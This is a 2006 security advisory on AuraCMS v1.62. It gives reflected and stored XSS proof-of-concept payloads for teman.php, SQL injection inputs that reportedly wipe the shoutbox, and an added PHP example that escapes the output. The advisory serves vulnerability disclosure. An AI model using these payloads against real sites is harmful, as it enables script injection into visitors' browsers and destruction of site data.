`by : iFX a.k.a inversFX
_______________________________
[ [email protected] ]
[ [email protected] ]
-------------------------------
locate : Indonesia, Jakarta
--------------------------------
date : 29/06/2006
--------------------------------
title : XSS on `CMS Aura v1.62`
--------------------------------
Developer CMS : Arif Supriyanto - [email protected]
http://www.auracms.tk
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com
--------------------------------
PoC :
--------------------------------------------------------------------
1. in 'teman.php' we can see the code :
.....
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang
artikel ini yang berjudul
: <b>$judul_artikel</b>.";
.....
we found something here: the variable $judul_artikel is echoed as-is,
so we can XSS from the URL :
1st ex:
http://localhost/teman.php?judul_artikel=<script>alert("mati dah gwa!!!")</script>
2nd ex:
or we can send an article to the admin with the XSS code in the title, so when an anonymous visitor opens index.php, the script runs.
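A hardened rendering of the teman.php fragment above, as an added example (not AuraCMS code and not from the advisory's author). The function names h() and render_teman() and the sample inputs are assumptions; the same output escaping applies wherever a stored article title is printed, such as index.php.

```php
<?php
declare(strict_types=1);
// Added example, not AuraCMS code. h(), render_teman() and the sample
// inputs below are hypothetical names and constructed data.

/** Escape a value for HTML text and quoted-attribute contexts. */
function h(string $value): string
{
    // ENT_QUOTES covers ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build the "Kirim ke Teman" fragment with the title escaped at output. */
function render_teman(array $query): string
{
    // Take the parameter explicitly from the request array (pass $_GET in
    // the real page) and accept only a string, so judul_artikel[]=x cannot
    // reach the template.
    $judul = $query['judul_artikel'] ?? '';
    if (!is_string($judul)) {
        $judul = '';
    }
    return '<p class="judul">Kirim ke Teman</p>' . "\n"
        . '<p class="konten">Anda ingin memberitahu teman Anda tentang '
        . 'artikel ini yang berjudul : <b>' . h($judul) . '</b>.</p>';
}

// Constructed inputs: the advisory's PoC value, a benign title, array input.
$samples = [
    ['judul_artikel' => '<script>alert("mati dah gwa!!!")</script>'],
    ['judul_artikel' => 'Berita & Info'],
    ['judul_artikel' => ['x']],
];
foreach ($samples as $query) {
    echo render_teman($query), "\n\n";
}
```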
---------------------------------------------------------------------
2. we found something here that can delete all shoutbox messages.
as usual we can shout anonymously with a fake name, mail, pesan.
here when I insert
name = ' or ''='     <== old SQL injection code
mail = test_string   <== you can fill it with a free mail address
pesan = ' or ''='    <== old SQL injection code
then all messages on it are cleared amazingly....
----------------------------------------------------------------------
screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt
----------------------------------------------------------------------
sorry for my words in English, cuz I often REMED!!!
_________________
/Shout :| |X|
-------------------------------------------------------------------------------------
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom kommunity, all hacker kommunity|
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius, ||||||||. |
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe, Shock-3d, G4mMa, Big_Red_One } |
-------------------------------------------------------------------------------------
|OK | Apply | Cancel |
----------------------
`